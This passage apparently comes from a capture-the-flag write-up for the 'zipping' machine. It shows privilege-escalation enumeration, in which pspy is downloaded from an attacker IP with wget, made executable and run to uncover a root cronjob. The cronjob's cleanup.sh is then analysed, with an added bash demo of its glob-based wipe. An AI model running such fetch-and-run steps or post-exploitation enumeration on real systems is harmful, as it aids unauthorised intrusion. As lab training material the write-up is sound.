PSPY
To look for scheduled jobs without read access to root's crontab, pspy was used to watch process creation; it revealed a cronjob running as root.
rektsu@zipping:/dev/shm$ wget -q http://10.10.14.4/pspy64 ; chmod 755 /dev/shm/pspy64
Delivery complete
rektsu@zipping:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
Executing PSPY
The root cronjob is executing a Bash script at
/etc/scripts/cleanup.sh
rektsu@zipping:/home/rektsu$ ll /etc/scripts/cleanup.sh
4.0k -rwxr-xr-x 1 root root 292 apr 1 03:27 /etc/scripts/cleanup.sh
rektsu@zipping:/home/rektsu$ cat /etc/scripts/cleanup.sh
#!/bin/bash
zips="/var/www/html/uploads"
config="/home/rektsu/.config"
if /usr/bin/find $zips -mindepth 1 -print -quit 2>/dev/null | grep -q .; then
/usr/bin/rm -rf $zips/*
fi
if /usr/bin/find $config -mindepth 1 -print -quit 2>/dev/null | grep -q .; then
/usr/bin/rm -rf $config/*
fi
It is wiping out everything in both the /var/www/html/uploads
and the /home/rektsu/.config
directories. Two details are worth noting: the script runs as root but operates on a directory inside a low-privileged user's home, and because the wipe uses the shell glob $dir/*, hidden entries (names beginning with a dot) are not matched and survive, even though the find -mindepth 1 check does see them. GNU rm -r unlinks symlinks rather than following them, so the wipe itself does not hand out a simple symlink trick.
While it is clear that the author wants to delete the uploaded files in the /var/www/html/uploads
directory, it is unclear what the /home/rektsu/.config
directory is about.
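To see exactly what cleanup.sh removes, the following added example (not part of the writeup or of the box) reproduces its non-emptiness check and its glob-based wipe in a scratch directory, puts it next to a find -delete variant, and counts what survives each. The function names and the scratch layout are this example's own; only the find/grep test and the rm -rf $dir/* wipe are copied from the script above.

```bash
#!/bin/bash
# Added example, not code from the writeup: replays the cleanup.sh logic
# against a throwaway directory to show which entries it actually removes.

# Same non-emptiness test as cleanup.sh: print the first entry below $1, stop,
# and let grep decide whether anything was printed.
dir_nonempty() {
    find "$1" -mindepth 1 -print -quit 2>/dev/null | grep -q .
}

# Same wipe as cleanup.sh: the $dir/* glob, which in a default shell does not
# match names beginning with a dot, so hidden entries are left behind.
wipe_like_cleanup() {
    if dir_nonempty "$1"; then
        rm -rf "$1"/*
    fi
}

# Variant that lets find enumerate and delete, hidden entries included.
wipe_with_find() {
    if dir_nonempty "$1"; then
        find "$1" -mindepth 1 -delete
    fi
}

# Build a constructed tree: a subdirectory with a file, a visible file and a
# hidden file. Echoes the scratch path.
make_tree() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/sub"
    echo x > "$tmp/sub/file"
    echo y > "$tmp/visible"
    echo z > "$tmp/.hidden"
    echo "$tmp"
}

# Run the given wipe function on a fresh tree and echo how many entries remain.
count_remaining_after() {
    t=$(make_tree)
    "$1" "$t"
    find "$t" -mindepth 1 | wc -l | tr -d ' '
    rm -rf "$t"
}

# Usage when run directly:
#   count_remaining_after wipe_like_cleanup   (the hidden file survives)
#   count_remaining_after wipe_with_find      (nothing survives)
```

The run illustrates why a tidy-up cron like this can keep "finding" content in a directory it claims to have emptied: the check and the wipe do not agree on what counts as an entry.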